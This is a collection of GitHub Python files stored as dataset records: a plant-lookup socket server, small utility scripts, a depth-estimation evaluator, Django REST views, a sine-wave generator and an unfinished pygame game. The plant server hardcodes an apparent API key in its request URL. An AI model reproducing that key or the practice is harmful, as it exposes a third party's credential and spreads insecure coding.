'__main__':\n\tmain()\n\n","repo_name":"ashih42/expert_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37441620697","text":"import socket\nfrom urllib.request import urlopen\nimport json\n\nurl = \"https://perenual.com/api/species-list?key=sk-yL9564c874f236cf61720&page=1\"\n\nresponse = urlopen(url)\n\ndata = json.loads(response.read())\n\n\nport = 1800\nhost = '127.0.0.1'\naddress = (host, port)\n\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserverSocket.bind(address)\n\nserverSocket.listen(1)\n\nconn, addr = serverSocket.accept()\n\nwhile True:\n input_name = conn.recv(1024).decode()\n save_plant = None\n message = 'false'\n for x in data[\"data\"]:\n if x[\"common_name\"].lower() == input_name.lower() or x[\"scientific_name\"].lower() == input_name.lower():\n save_plant = x\n message = 'true'\n break\n\n conn.send(message.encode())\n\n if message == 'false':\n continue\n\n message = conn.recv(1024).decode()\n\n if message == '1':\n response = data[\"data\"][save_plant][\"scientific_name\"]\n elif message == '2':\n response = data[\"data\"][save_plant][\"watering\"]\n elif message == '3':\n response = data[\"data\"][save_plant][\"sunlight\"]\n elif message == '4':\n response = data[\"data\"][save_plant][\"cycle\"]\n\n # for i in range(len(data[\"data\"])):\n # if data[\"data\"][i][\"common_name\"] == message.lower():\n # plant_info = f'Scientific Name: {data[\"data\"][i][\"scientific_name\"]}\\nWatering: {data[\"data\"][i][\"watering\"]}\\nSunlight: {data[\"data\"][i][\"sunlight\"]}\\nCycle: {data[\"data\"][i][\"cycle\"]}\\n'\n # response = plant_info\n # else:\n # response = \"Plant may not be in database. Check for spelling!\"\n\n\n # Send message to the client\n conn.send(str(response).encode())\n\n# Close sockets\nconn.close() # Close new socket\nserverSocket.close() # Close serverSocket\n","repo_name":"Jesus-Palapa/PortfolioProject361","sub_path":"plant_partner.py","file_name":"plant_partner.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15009164800","text":"#average temperature calculation\n\nnumDays = int(input('Please specify for how many days the temperatures to be taken:'))\n\ntemp=[]\ntotal=0\n\nfor i in range(0,numDays):\n temp1=int(input(f\"day's {i+1} temperature:\"))\n temp.append(temp1)\n total+=temp1\n\naverage_temp=round((sum(temp)/len(temp)),2)\nprint(f\"average: {average_temp}\")\n\ncount=[i for i in temp if i>average_temp]\n\nprint(f\"the no of days which have greater tempature than the average temperature: {len(count)}\")","repo_name":"saiharshithpalepu/DSA","sub_path":"Lists/average_temperature.py","file_name":"average_temperature.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70388989483","text":"import re, os\n\nids=[]\ndoc=input(\"enter document name here:\")\nwith open (\"C:\\\\Users\\\\USER\\\\Downloads\\\\\"+ doc)as f:\n for line in f:\n if \"TRACE\"not in line:\n continue\n pattern=r\"\\d+$\"\n pattern2=r\"^\\d\\d\\d\\d-\\d\\d-\\d\\d \"\n word=re.search(pattern,line).group(0)\n match=re.search(pattern2,line).group(0)\n words=f\"ids:{word} and date is :{match}\"\n print(words)\n \n \n","repo_name":"EmperorDa8/random-scripts","sub_path":"syslogfile.py","file_name":"syslogfile.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72343867243","text":"import rasterio\n\ndef get_geo_ref_points_tiff_path(tiff_path):\n ds = rasterio.open(tiff_path)\n minx = ds.bounds.left\n maxx = ds.bounds.right\n miny = ds.bounds.bottom\n maxy = ds.bounds.top\n return {\n 'ul': {'x': minx, 'y': maxy}, \n 'ur': {'x': maxx, 'y': maxy},\n 'll': {'x': minx, 'y': miny}, \n 'lr': {'x': maxx, 'y': miny}\n }\n\ndef get_geo_ref_points_info_landsat_c1_l2(info):\n return {\n 'ul': {'x': info['CORNER_UL_PROJECTION_X_PRODUCT'], 'y': info['CORNER_UL_PROJECTION_Y_PRODUCT']},\n 'ur': {'x': info['CORNER_UR_PROJECTION_X_PRODUCT'], 'y': info['CORNER_UR_PROJECTION_Y_PRODUCT']},\n 'll': {'x': info['CORNER_LL_PROJECTION_X_PRODUCT'], 'y': info['CORNER_LL_PROJECTION_Y_PRODUCT']},\n 'lr': {'x': info['CORNER_LR_PROJECTION_X_PRODUCT'], 'y': info['CORNER_LR_PROJECTION_Y_PRODUCT']},\n }","repo_name":"ceos-seo/odc_manual_indexer","sub_path":"utils/get_geo_ref_points.py","file_name":"get_geo_ref_points.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"27348452874","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nfrom cv2 import cv2\nimport numpy as np\n\nimport torch\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\n\nfrom layers import disp_to_depth\nfrom utils import readlines, printc\nfrom options import MonodepthOptions\nimport datasets\nimport networks\n\nfrom tqdm import tqdm\nimport PIL.Image as pil\nimport time\n\ncv2.setNumThreads(\n 0) # This speeds up evaluation 5x on our unix systems (OpenCV 3.3.1)\n\nsplits_dir = os.path.join(os.path.dirname(__file__), \"splits\")\n\n# Models which were trained with stereo supervision were trained with a nominal\n# baseline of 0.1 units. The KITTI rig has a baseline of 54cm. Therefore,\n# to convert our stereo predictions to real-world scale we multiply our depths by 5.4.\nSTEREO_SCALE_FACTOR = 5.4\n\n\ndef set_lr(optimizer, lr):\n for g in optimizer.param_groups:\n g['lr'] = lr\n\n\ndef optimize_with_lidar(opt, encoder, depth_decoder, data):\n params = []\n for _, param in encoder.named_parameters():\n if param.requires_grad:\n params.append(param)\n for _, param in depth_decoder.named_parameters():\n if param.requires_grad:\n params.append(param)\n optimizer = torch.optim.Adam(params, lr=opt.learning_rate)\n prev_loss = 0\n\n input_color = data[(\"color\", 0, 0)].cuda()\n input_lidar = data[(\"lidar\", 0, 0)].cuda()\n if opt.sparse:\n input_data = torch.cat((input_color, input_lidar), 1)\n else:\n input_data = input_color\n for idx_iter in range(opt.num_iters):\n output = depth_decoder(encoder(input_data))\n loss = 0\n # if idx_iter <= 10:\n # set_lr(optimizer, opt.learning_rate * (idx_iter + 1) / 10)\n if -1 in opt.scales:\n height, width = data[(\"lidar\", 0, -1)].shape[2:]\n output['disp', -1] = F.interpolate(output['disp', 0],\n [height, width],\n mode=\"bilinear\",\n align_corners=False)\n for scale in opt.scales:\n lidar = data[(\"lidar\", 0, scale)].cuda() * 80\n disp = output[(\"disp\", scale)]\n mask = lidar > 0\n _, pred = disp_to_depth(disp, opt.min_depth, opt.max_depth)\n selected_pred = pred[mask]\n selected_lidar = lidar[mask]\n if opt.median_scaling:\n ratio = float((selected_lidar / selected_pred).median())\n selected_pred *= ratio\n loss += ((selected_lidar - selected_pred)**2).mean()\n # print(loss)\n # if abs(prev_loss - loss) / loss < 1e-2:\n # break\n prev_loss = float(loss)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return depth_decoder(encoder(input_data))\n\n\ndef compute_errors(gt, pred):\n \"\"\"Computation of error metrics between predicted and ground truth depths\n \"\"\"\n thresh = np.maximum((gt / pred), (pred / gt))\n a1 = (thresh < 1.25).mean()\n a2 = (thresh < 1.25**2).mean()\n a3 = (thresh < 1.25**3).mean()\n\n rmse = (gt - pred)**2\n # [m] to [mm]\n rmse = np.sqrt(rmse[gt.nonzero()].mean()) * 1000\n mae = np.abs(gt - pred)[gt.nonzero()].mean() * 1000\n\n return rmse, mae, a1, a2, a3\n\n\ndef batch_post_process_disparity(l_disp, r_disp):\n \"\"\"Apply the disparity post-processing method as introduced in Monodepthv1\n \"\"\"\n _, h, w = l_disp.shape\n m_disp = 0.5 * (l_disp + r_disp)\n l, _ = np.meshgrid(np.linspace(0, 1, w), np.linspace(0, 1, h))\n l_mask = (1.0 - np.clip(20 * (l - 0.05), 0, 1))[None, ...]\n r_mask = l_mask[:, :, ::-1]\n return r_mask * l_disp + l_mask * r_disp + (1.0 - l_mask - r_mask) * m_disp\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n opt.eval_split = 'completion'\n opt.eval_mono = 1\n opt.eval_stereo = 0\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n filenames = readlines(\n os.path.join(splits_dir, opt.eval_split, \"test_files.txt\"))\n gt_path = os.path.join(splits_dir, opt.eval_split, \"gt_depths.npz\")\n gt_depths = np.load(gt_path,\n fix_imports=True,\n encoding='latin1',\n allow_pickle=True)[\"data\"]\n if opt.ext_disp_to_eval is None:\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n\n encoder_dict = torch.load(encoder_path)\n\n print(opt.eval_split)\n dataset = datasets.KITTIDepthDataset(opt.data_path,\n filenames,\n encoder_dict['height'],\n encoder_dict['width'], [0],\n 4,\n is_train=False,\n img_ext='.png')\n dataloader = DataLoader(dataset,\n opt.batch_size,\n shuffle=False,\n num_workers=opt.num_workers,\n pin_memory=True,\n drop_last=False)\n\n encoder = networks.ResnetEncoder(opt.num_layers,\n False,\n sparse=opt.sparse)\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc,\n sparse=opt.sparse)\n\n model_dict = encoder.state_dict()\n\n encoder_state = {\n k.replace('module.', ''): v\n for k, v in encoder_dict.items()\n if k.replace('module.', '') in model_dict\n }\n encoder.load_state_dict(encoder_state)\n decoder_state = torch.load(decoder_path)\n decoder_state = {\n k.replace('module.', ''): v for k, v in decoder_state.items()\n }\n depth_decoder.load_state_dict(decoder_state)\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n pred_disps = []\n\n print(\"-> Computing predictions with size {}x{}\".format(\n encoder_dict['width'], encoder_dict['height']))\n model_info = 'with' if opt.sparse else 'without'\n print(\"-> Model {} lidar input.\".format(model_info))\n\n if opt.batch_size > 1:\n iterator = tqdm(dataloader)\n else:\n iterator = dataloader\n for idx, data in enumerate(iterator):\n if opt.optimize:\n encoder.load_state_dict(encoder_state)\n depth_decoder.load_state_dict(decoder_state)\n output = optimize_with_lidar(opt, encoder, depth_decoder, data)\n else:\n input_color = data[(\"color\", 0, 0)].cuda()\n input_lidar = data[(\"lidar\", 0, 0)].cuda()\n if opt.post_process:\n # Post-processed results require each image to have two forward passes\n input_color = torch.cat(\n (input_color, torch.flip(input_color, [3])), 0)\n if opt.sparse:\n input_data = torch.cat((input_color, input_lidar), 1)\n else:\n input_data = input_color\n output = depth_decoder(encoder(input_data))\n\n if opt.sparse:\n # pred_disp = output[(\"disp\", 0)].cpu()[:, 0].numpy()\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)],\n opt.min_depth,\n opt.max_depth)\n else:\n pred_disp, pred_depth = disp_to_depth(output[(\"disp\", 0)],\n opt.min_depth,\n opt.max_depth)\n pred_disp = pred_disp.detach().cpu()[:, 0].numpy()\n pred_depth = pred_depth.detach().cpu()[0, 0].numpy()\n\n if opt.batch_size == 1:\n if opt.median_scaling:\n lidar = data[(\"lidar\", 0, 0)][0, 0] * 80\n mask = lidar > 0\n ratio = float((lidar[mask] / pred_depth[mask]).median())\n pred_depth *= ratio\n # gt_depth = gt_depths[idx]\n gt_depth = data[\"depth_gt\"][0, 0].numpy()\n gt_height, gt_width = gt_depth.shape[:2]\n pred_depth = cv2.resize(pred_depth, (gt_width, gt_height))\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n mask = gt_depth > 0\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n print('[{}]'.format(idx), compute_errors(gt_depth, pred_depth))\n\n if opt.post_process:\n N = pred_disp.shape[0] // 2\n pred_disp = batch_post_process_disparity(\n pred_disp[:N], pred_disp[N:, :, ::-1])\n\n pred_disps.append(pred_disp)\n\n pred_disps = np.concatenate(pred_disps)\n\n else:\n # Load predictions from file\n print(\"-> Loading predictions from {}\".format(opt.ext_disp_to_eval))\n pred_disps = np.load(opt.ext_disp_to_eval)\n\n if opt.eval_eigen_to_benchmark:\n eigen_to_benchmark_ids = np.load(\n os.path.join(splits_dir, \"benchmark\",\n \"eigen_to_benchmark_ids.npy\"))\n\n pred_disps = pred_disps[eigen_to_benchmark_ids]\n\n if opt.ext_disp_to_eval is None and opt.save_pred_disps:\n output_path = os.path.join(opt.load_weights_folder,\n \"disps_{}_split.npy\".format(opt.eval_split))\n print(\"-> Saving predicted disparities to \", output_path)\n np.save(output_path, pred_disps)\n\n if opt.no_eval:\n print(\"-> Evaluation disabled. Done.\")\n quit()\n\n elif opt.ext_disp_to_eval is None and opt.eval_split in [\n 'benchmark', 'completion'\n ]:\n save_dir = os.path.join(opt.load_weights_folder,\n \"benchmark_predictions\")\n print(\"-> Saving out benchmark predictions to {}\".format(save_dir))\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n for idx in range(len(pred_disps)):\n disp_resized = cv2.resize(pred_disps[idx], (1216, 352))\n depth = STEREO_SCALE_FACTOR / disp_resized\n depth = np.clip(depth, 0, 80)\n depth = np.uint16(depth * 256)\n save_path = os.path.join(save_dir, \"{:010d}.png\".format(idx))\n cv2.imwrite(save_path, depth)\n\n print(\" Mono evaluation - {} using median scaling\".format(\n \"\" if opt.median_scaling else \"not\"))\n\n errors = []\n ratios = []\n stds = []\n\n side_map = {\"2\": '2', \"3\": '3', \"l\": '2', \"r\": '3'}\n for i in range(pred_disps.shape[0]):\n\n # Get projected velodyne depth\n folder, frame_id, side = filenames[i].split()\n frame_id = int(frame_id)\n velodyne_path = os.path.join(opt.data_path, folder, \"proj_depth\",\n \"velodyne_raw\", \"image_0\" + side_map[side],\n \"{:010d}.png\".format(frame_id))\n\n velodyne_depth = cv2.imread(velodyne_path, cv2.IMREAD_ANYDEPTH).astype(\n np.float32) / 256\n velodyne_mask = velodyne_depth > 1e-7\n mask_idx = velodyne_mask.nonzero()\n\n gt_depth = gt_depths[i]\n gt_height, gt_width = gt_depth.shape[:2]\n\n pred_disp = pred_disps[i]\n pred_disp = cv2.resize(pred_disp, (gt_width, gt_height))\n if opt.sparse:\n # pred_depth = pred_disp\n pred_depth = 1 / pred_disp\n else:\n pred_depth = 1 / pred_disp\n mask = gt_depth > 0\n\n pred_depth *= opt.pred_depth_scale_factor\n # Calc ratios\n ratio_image = velodyne_depth[velodyne_mask] / pred_depth[velodyne_mask]\n ratio = ratio_image.mean()\n stds.append(np.std(ratio_image))\n\n ratios.append(ratio)\n if opt.median_scaling:\n pred_depth *= ratio\n\n pred_depth = pred_depth[mask]\n gt_depth = gt_depth[mask]\n\n pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH\n pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH\n\n errors.append(compute_errors(gt_depth, pred_depth))\n\n stds = np.array(stds)\n print('std in single image | max: {:.3f}, min: {:.3f}'.format(\n np.max(stds), np.min(stds)))\n\n ratios = np.array(ratios)\n med = np.median(ratios)\n print(\n \" Scaling ratios | min: {:.3f} | max: {:.3f} | med: {:0.3f} | std: {:0.3f}\"\n .format(ratios.min(), ratios.max(), med, np.std(ratios)))\n\n mean_errors = np.array(errors).mean(0)\n\n print(\"\\n| \" + (\"{:>8} | \" * 5).format(\"rmse\", \"mae\", \"a1\", \"a2\", \"a3\"))\n print((\"| {:8.3f} \" * 5).format(*mean_errors.tolist()) + \"\\\\\\\\\")\n print(\"\\n-> Done!\")\n\n\nif __name__ == \"__main__\":\n options = MonodepthOptions()\n evaluate(options.parse())\n","repo_name":"Dai-z/monodepth2","sub_path":"evaluate_depth_completion.py","file_name":"evaluate_depth_completion.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"22704560777","text":"#\n# @lc app=leetcode id=538 lang=python3\n#\n# [538] Convert BST to Greater Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom typing import Optional\nfrom TreeNode import *\n\n\nclass Solution:\n def convertBST(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n def dfs(cur: TreeNode, from_parent: int) -> TreeNode:\n if not cur:\n return 0\n \n if cur.right:\n right = dfs(cur.right, from_parent)\n cur.val += right\n else:\n cur.val += from_parent\n \n if cur.left:\n left = dfs(cur.left, cur.val)\n return left\n return cur.val\n\n dfs(root, 0)\n return root\n\n \n# @lc code=end\nsolution = Solution()\ntree = deserialize(\"[4,1,6,0,2,5,7,null,null,null,3,null,null,null,8]\")\nprintTree(tree)\nprint(\"\")\nprintTree(solution.convertBST(tree))\n","repo_name":"Real1236/LeetcodePython","sub_path":"leetcode/editor/en/538.convert-bst-to-greater-tree.py","file_name":"538.convert-bst-to-greater-tree.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14644634735","text":"from . import models, serializers, permissions, filters\nfrom rest_framework import generics\nfrom rest_framework import permissions as rest_permissions\nfrom rest_framework import filters as rest_filters\nimport django_filters\n\n\nclass UserList(generics.ListCreateAPIView):\n queryset = models.User.objects.all()\n serializer_class = serializers.UserSerializer\n\n\nclass UserDetail(generics.RetrieveUpdateAPIView):\n queryset = models.User.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsSelfOrReadOnlyUser)\n serializer_class = serializers.UserSerializer\n\n\nclass ClubList(generics.ListCreateAPIView):\n queryset = models.Club.objects.all()\n serializer_class = serializers.ClubSerializer\n permission_classes = (rest_permissions.IsAuthenticated,\n rest_permissions.DjangoModelPermissions)\n filter_backends = (rest_filters.SearchFilter,\n filters.MyClubsFilterBackend)\n search_fields = ('name',)\n\n\nclass ClubDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Club.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsSecyOrRepOrReadOnlyClub)\n serializer_class = serializers.ClubDetailSerializer\n\n\nclass ClubRoleList(generics.ListCreateAPIView):\n queryset = models.ClubRole.objects.all()\n serializer_class = serializers.ClubRoleSerializer\n filter_backends = (filters.MyClubRolesFilterBackend,)\n\n\nclass ClubRoleDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.ClubRole.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsRepClubRole)\n serializer_class = serializers.ClubRoleSerializer\n\n\nclass ChannelList(generics.ListAPIView):\n queryset = models.Channel.objects.all()\n serializer_class = serializers.ChannelSerializer\n\n\nclass ChannelDetail(generics.RetrieveUpdateAPIView):\n queryset = models.Channel.objects.all()\n serializer_class = serializers.ChannelSerializer\n\n\nclass PostList(generics.ListCreateAPIView):\n serializer_class = serializers.PostSerializer\n\n def get_queryset(self):\n \"\"\"\n This view should return a list of all the posts for channels subscribed by the user.\n \"\"\"\n return models.Post.objects.filter(channel__subscribers__id__contains=self.request.user.id)\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Post.objects.all()\n serializer_class = serializers.PostSerializer\n\n\nclass ConversationList(generics.ListCreateAPIView):\n serializer_class = serializers.ConversationSerializer\n\n def get_queryset(self):\n \"\"\"\n This view should return a list of all the conversations for channels subscribed by the user.\n \"\"\"\n return models.Conversation.objects.filter(channel__club__roles__members__id__contains=self.request.user.id)\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass ConversationDetail(generics.RetrieveAPIView):\n queryset = models.Conversation.objects.all()\n permission_classes = (rest_permissions.IsAuthenticated,\n permissions.IsClubMemberReadOnlyPost)\n serializer_class = serializers.ConversationSerializer\n\n\nclass ProjectList(generics.ListCreateAPIView):\n queryset = models.Project.objects.all()\n serializer_class = serializers.ProjectSerializer\n\n\nclass ProjectDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Project.objects.all()\n serializer_class = serializers.ProjectSerializer\n\n\nclass FeedbackList(generics.ListCreateAPIView):\n queryset = models.Feedback.objects.all()\n serializer_class = serializers.FeedbackSerializer\n\n\nclass FeedbackDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.Feedback.objects.all()\n serializer_class = serializers.FeedbackSerializer\n\n\nclass FeedbackReplyList(generics.ListCreateAPIView):\n queryset = models.FeedbackReply.objects.all()\n serializer_class = serializers.FeedbackReplySerializer\n\n\nclass FeedbackReplyDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = models.FeedbackReply.objects.all()\n serializer_class = serializers.FeedbackReplySerializer\n","repo_name":"Pratik-Chhajer/clubnet","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"3069492030","text":"import random\nimport math\nimport argparse\nimport os\nfrom scipy.io.wavfile import write\nimport csv\nimport numpy as np\n\ndef get_args():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--length\", type=float, dest=\"length\", default=1.0, help=\"length of each sample in seconds\")\n\tparser.add_argument(\"--size\", type=int, dest=\"size\", default=150)\n\tparser.add_argument(\"--out_dir\", type=str, dest=\"out_dir\", default=\"../data\")\n\tparser.add_argument(\"--wav_dir\", type=str, dest=\"wav_dir\", default=\"../data/wav_files\")\n\tparser.add_argument(\"--sample_rate\", type=int, dest=\"sample_rate\", default=44100)\n\targs = parser.parse_args()\n\tprint(f\"RUN: {vars(args)}\")\n\treturn args\n\ndef generate_sine(sample_rate, length, params):\n\tnum_samples = int(sample_rate*length)\n\tdata = np.zeros(num_samples)\n\tfor i in range(num_samples):\n\t\tt = float(i) / sample_rate\n\t\tv = ((params[\"a1\"] * math.sin(t * params[\"f1\"] * math.pi)) + (params[\"a2\"] * math.sin(t * params[\"f2\"] * math.pi))) * 0.5\n\n\t\t# normalization\n\t\tpeak = np.max(np.absolute(v))\n\t\tif peak > 0:\n\t\t v = v / peak\n\n\t\tdata[i] = v\n\n\treturn data \n\ndef sample_param(param):\n\tindex = random.choice(range(len(param)))\n\treturn param[index]\n\ndef main():\n\targs = get_args()\n\tos.makedirs(args.out_dir, exist_ok=True)\n\tos.makedirs(args.wav_dir, exist_ok=True)\n\n\t# stores parameters <-> filename mapping\n\tmeta_file = os.path.join(args.out_dir, \"meta.csv\")\n\n\tparameters = {\"f1\": [100, 200, 400],\n\t\t\t\t \"a1\": [0.5, 0.7, 1.0],\n\t\t\t\t \"f2\": [800, 1200, 1600],\n\t\t\t\t \"a2\": [0.5, 0.7, 1.0]}\n\n\t# sample parameters\n\tparam_set = []\n\tfor i in range(args.size):\n\t\tnew_set = {k: sample_param(v) for k, v in parameters.items()}\n\t\t# print(new_set)\n\t\tparam_set.append(new_set)\n\n\tdataset = []\n\tfor i, param in enumerate(param_set):\n\t\td = {\"filename\": os.path.join(args.wav_dir, \"{:05d}.wav\".format(i))}\n\t\td.update(param)\n\t\tdataset.append(d)\n\t\tprint(\"generating example: {}\".format(d))\n\n\t\taudio = generate_sine(args.sample_rate, args.length, param)\n\t\twrite(d[\"filename\"], args.sample_rate, audio)\n\n\t#write the meta file\n\twith open(meta_file, 'w') as f:\n\t\t\twriter = csv.DictWriter(f, fieldnames=[\"id\", \"filename\", \"a1\", \"f1\", \"a2\", \"f2\"])\n\t\t\twriter.writeheader()\n\t\t\tfor i, d in enumerate(dataset):\n\t\t\t\td[\"id\"] = i\n\t\t\t\twriter.writerow(d)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"CandyDong/15622-term-project","sub_path":"generators/sine_generator.py","file_name":"sine_generator.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18747662238","text":"import pygame\r\nimport random\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((800,450))\r\ndef makeTextObjects(text,font):\r\n textSurface = font.render(text,True,(0,0,0))\r\n return textSurface, textSurface.get_rect()\r\ndef instructionMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (screen.get_width()/2,screen.get_height()/2)\r\n screen.blit(textSurf,textRect)\r\ndef killMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (50,20)\r\n screen.blit(textSurf,textRect)\r\ndef missMessage(text):\r\n smallText = pygame.font.SysFont(\"Arial\",30)\r\n textSurf, textRect = makeTextObjects(text,smallText)\r\n textRect.center = (740,20)\r\n screen.blit(textSurf,textRect)\r\nclass Player(pygame.sprite.Sprite):\r\n rightImages = []\r\n leftImages = []\r\n punchRightImages = []\r\n punchLeftImages = []\r\n rightCounter = 1\r\n leftCounter = 1\r\n punchRightCounter = 1\r\n punchLeftCounter = 1\r\n direction = \"Right\"\r\n punching = False\r\n kills = 0\r\n miss = 0\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self,self.containers)\r\n self.image = self.rightImages[0]\r\n self.rect = self.image.get_rect()\r\n self.rect.x = 400\r\n self.rect.y = 390\r\n def update(self):\r\n keypress = pygame.key.get_pressed()\r\n self.punching = False\r\n if keypress[pygame.K_RIGHT]:\r\n self.rect.x += 5\r\n self.image = self.rightImages[self.rightCounter]\r\n self.rightCounter = (self.rightCounter + 1) % len(self.rightImages)\r\n self.direction = \"Right\"\r\n if keypress[pygame.K_LEFT]:\r\n self.rect.x -= 5\r\n self.image = self.leftImages[self.leftCounter]\r\n self.leftCounter = (self.leftCounter + 1) % len(self.leftImages)\r\n self.direction = \"Left\"\r\n if keypress[pygame.K_SPACE] and self.direction == \"Right\":\r\n self.image = self.punchRightImages[self.punchRightCounter]\r\n self.punchRightCounter = (self.punchRightCounter + 1) % len(self.punchRightImages)\r\n self.punching = True\r\n if keypress[pygame.K_SPACE] and self.direction == \"Left\":\r\n self.image = self.punchLeftImages[self.punchLeftCounter]\r\n self.punchLeftCounter = (self.punchLeftCounter + 1) % len(self.punchLeftImages)\r\n self.punching = True\r\nclass Obstacle(pygame.sprite.Sprite):\r\n direction = \"None\"\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self,self.containers)\r\n self.image = pygame.Surface((50,50))\r\n self.image = self.image.convert()\r\n self.image.fill((0,0,0))\r\n pygame.draw.rect(self.image,(0,255,0),(50,50,50,50))\r\n self.rect = self.image.get_rect()\r\n if random.randrange(0,2) % 2:\r\n self.direction = \"Right\"\r\n self.rect.y = 400\r\n self.rect.x = screen.get_height()+300\r\n else:\r\n self.direction = \"Left\"\r\n self.rect.y = 400\r\n self.rect.x = 0\r\n def update(self):\r\n if self.direction == \"Right\":\r\n self.rect.x -= 5\r\n if self.rect.x < 0:\r\n self.kill()\r\n else:\r\n self.rect.x += 5\r\n if self.rect.x > screen.get_width():\r\n self.kill()\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, image_file, location):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.image.load(image_file)\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\nPlayer.rightImages.append((pygame.image.load(\"agent1.png\")))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[0],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent2.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[1],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent3.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[2],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent4.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[3],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent5.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[4],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent6.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[5],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent7.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[6],True,False))\r\nPlayer.rightImages.append(pygame.image.load(\"agent8.png\"))\r\nPlayer.leftImages.append(pygame.transform.flip(Player.rightImages[7],True,False))\r\nPlayer.punchRightImages.append(pygame.image.load(\"agentpunch1.png\"))\r\nPlayer.punchLeftImages.append(pygame.transform.flip(Player.punchRightImages[0],True,False))\r\nPlayer.punchRightImages.append(pygame.image.load(\"agentpunch2.png\"))\r\nPlayer.punchLeftImages.append(pygame.transform.flip(Player.punchRightImages[1],True,False))\r\nclock = pygame.time.Clock()\r\nkeepGoing = True\r\nobstacles = pygame.sprite.Group()\r\nallSprite = pygame.sprite.RenderUpdates()\r\nPlayer.containers = allSprite\r\nObstacle.containers = allSprite, obstacles\r\nplayer = Player()\r\nbackground = Background(\"Summer.jpg\",[0,0])\r\nwhile keepGoing:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n keepGoing = False\r\n if random.randrange(0,100) < 2:\r\n obstacles.add(Obstacle())\r\n 